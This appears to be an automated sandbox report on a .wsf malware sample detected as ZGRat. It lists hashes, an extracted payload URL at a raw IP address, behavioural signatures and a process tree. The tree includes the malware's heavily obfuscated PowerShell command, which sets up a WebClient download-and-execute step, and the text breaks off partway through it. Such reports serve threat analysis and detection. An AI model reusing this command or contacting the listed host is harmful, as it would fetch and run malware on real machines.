Analysis
-
max time kernel
145s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
23/01/2024, 12:29
Static task
static1
Behavioral task
behavioral1
Sample
f4accddf3bacbc70b54763800af4d7f47a427edd249ba1066ffcadb1458c03db (1).wsf
Resource
win7-20231215-en
General
-
Target
f4accddf3bacbc70b54763800af4d7f47a427edd249ba1066ffcadb1458c03db (1).wsf
-
Size
144KB
-
MD5
d98237f1eb423d002ec4431002532420
-
SHA1
3c03b0e124cf15312a0cf43e1a74a3827b027e29
-
SHA256
f4accddf3bacbc70b54763800af4d7f47a427edd249ba1066ffcadb1458c03db
-
SHA512
9f5b13ed4f562508635ead16e1976b05c79be6f94a6d95a8dac2ec538954c33e232682b3b2c1c637c1a928e8cc00c0589da834e41cd558df51c45eba01596a4f
-
SSDEEP
3072:LvvvvvvvvvvvkAAAAAAAAAAABvvvvvvvvvvvkAAAAAAAAAAAyvvvvvvvvvvvkAAn:QAAAAAAAAAAASAAAAAAAAAAAdAAAAAA3
Malware Config
Extracted
http://185.81.157.103/96/1.txt
Signatures
-
Detect ZGRat V1 1 IoCs
resource yara_rule behavioral1/memory/1316-35-0x000000001B600000-0x000000001B634000-memory.dmp family_zgrat_v1 -
Blocklisted process makes network request 2 IoCs
flow pid Process 3 1692 WScript.exe 6 2744 powershell.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2744 powershell.exe 1316 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2744 powershell.exe Token: SeDebugPrivilege 1316 powershell.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 1692 wrote to memory of 2744 1692 WScript.exe 28 PID 1692 wrote to memory of 2744 1692 WScript.exe 28 PID 1692 wrote to memory of 2744 1692 WScript.exe 28 PID 1040 wrote to memory of 2872 1040 taskeng.exe 34 PID 1040 wrote to memory of 2872 1040 taskeng.exe 34 PID 1040 wrote to memory of 2872 1040 taskeng.exe 34 PID 2872 wrote to memory of 2540 2872 WScript.exe 37 PID 2872 wrote to memory of 2540 2872 WScript.exe 37 PID 2872 wrote to memory of 2540 2872 WScript.exe 37 PID 2540 wrote to memory of 1316 2540 cmd.exe 36 PID 2540 wrote to memory of 1316 2540 cmd.exe 36 PID 2540 wrote to memory of 1316 2540 cmd.exe 36 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f4accddf3bacbc70b54763800af4d7f47a427edd249ba1066ffcadb1458c03db (1).wsf"1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:1692 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex('(&aUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥y(aUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yGaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yCaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yM *aUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yWaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥y-aUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yOaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥y*aUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥y)NaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yeaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ytaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥y.aUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yWaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yeaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ybaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yCaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ylaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yiaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yeaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ynaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ytaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥y).DaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yoaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ywaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ynaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ylaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSR